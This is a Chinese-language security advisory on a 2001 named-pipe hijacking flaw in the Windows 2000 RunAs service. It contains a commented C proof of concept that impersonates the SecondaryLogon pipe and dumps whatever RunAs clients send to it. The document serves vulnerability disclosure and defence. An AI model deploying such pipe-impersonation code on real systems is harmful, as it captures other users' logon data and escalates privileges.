Windows 2000 RunAs 服务存在有名管道被劫持漏洞
发布时间:2001-11-13 更新时间:2001-11-13 严重程度:高 威胁程度:权限提升 错误类型:设计错误 利用方式:服务器模式
受影响系统 Microsoft Windows 2000 SP2
详细描述 Windows 2000 RunAs 服务允许应用程序或者服务以不同用户执行,它通过按住shift键并右键点击图标,然后选择'Run as..'访问。 当RunAs服务被调用的时候,它可以为客户端建立有名管道来进行信任通信。 如果RunAs服务停止,当另一个用户尝试使用'RunAs'攻击者可以建立同样名字的有名管道来进行信任通信。
测试代码

// radix1112200101.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.
//
// What this listing demonstrates (see the advisory text above): an ordinary
// process creating a named pipe under the same well-known name the Windows
// 2000 Secondary Logon (RunAs) service uses, then logging whatever a RunAs
// client sends to it and answering with an access-denied status. Per the
// advisory this only applies while the real service is not running; the fix
// is stated to ship in Service Pack 3.
// Defensive reading: a client must not trust a pipe server on the strength
// of its name alone -- the server's identity has to be verified.

#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE

#include <windows.h>
#include <tchar.h>
#include <stdio.h>

#define MAX_IN_BUF 0x1000   // bytes requested per ReadFile; also the inbound buffer size
#define MAX_OUT_BUF 0x4     // outbound buffer size: exactly one DWORD reply
#define MAX_INST 0xA        // maximum number of simultaneous pipe instances
// Well-known pipe name of the Secondary Logon service; _T() makes it wide under UNICODE.
#define SECONDARY_LOGON_PIPE _T("\\\\.\\pipe\\SecondaryLogon")

// Entry point.
// NOTE(review): `void main()` is non-standard C; `int main(void)` is the portable form.
void main()
{
    HANDLE hPipe;

    // Duplex, byte-mode, blocking (PIPE_WAIT) pipe. The final 0 passes no
    // SECURITY_ATTRIBUTES, so the pipe gets whatever default security the
    // creating process is given.
    hPipe = CreateNamedPipe(SECONDARY_LOGON_PIPE, PIPE_ACCESS_DUPLEX,
                            PIPE_TYPE_BYTE | PIPE_WAIT, MAX_INST, MAX_OUT_BUF,
                            MAX_IN_BUF, NMPWAIT_USE_DEFAULT_WAIT, 0);

    if (hPipe == INVALID_HANDLE_VALUE) {
        // Presumably the case while the real service still owns the name -- confirm.
        // NOTE(review): GetLastError() returns a DWORD; %d is a mismatched
        // specifier (use %lu).
        printf("Can't create secondary logon pipe. Error %d\n", GetLastError());
        return;
    }

    printf("Created pipe and waiting for clients...\n");

    // PIPE_WAIT mode: this blocks until a client opens the pipe.
    if (ConnectNamedPipe(hPipe, 0)) {
        UCHAR InBuf[MAX_IN_BUF];
        DWORD dwReadCount;

        // Keep servicing the same client until ReadFile fails
        // (e.g. the client disconnects).
        while (ReadFile(hPipe, InBuf, MAX_IN_BUF, &dwReadCount, 0)) {
            // NOTE(review): dwReadCount is a DWORD; %d is mismatched (use %lu).
            printf("Read %d bytes. (ASCII Dump)\n", dwReadCount);

            DWORD dwPos;
            // Every received byte is echoed with %c without filtering, so
            // non-printable bytes from the peer go straight to the console.
            // The newline test also fires at dwPos == 0, so the first row
            // holds one byte and later rows sixteen.
            for (dwPos = 0; dwPos < dwReadCount; dwPos++) {
                printf("%c ", InBuf[dwPos]);
                if ((dwPos % 16) == 0)
                    printf("\n");
            }

            // Reply to each message with ERROR_ACCESS_DENIED (one DWORD, which
            // is what MAX_OUT_BUF was sized for). WriteFile's result is not
            // checked; a short or failed write goes unnoticed.
            DWORD dwReply = ERROR_ACCESS_DENIED;
            DWORD dwWroteCount;
            WriteFile(hPipe, &dwReply, sizeof(DWORD), &dwWroteCount, 0);
        }
    }

    // Reached once the read loop ends, or directly if ConnectNamedPipe failed.
    DisconnectNamedPipe(hPipe);
    CloseHandle(hPipe);
}

解决方案 此补丁将在Service Pack3上修补。
相关信息 参考:http://www.camisade.com/research/reports/radix1112200101.html |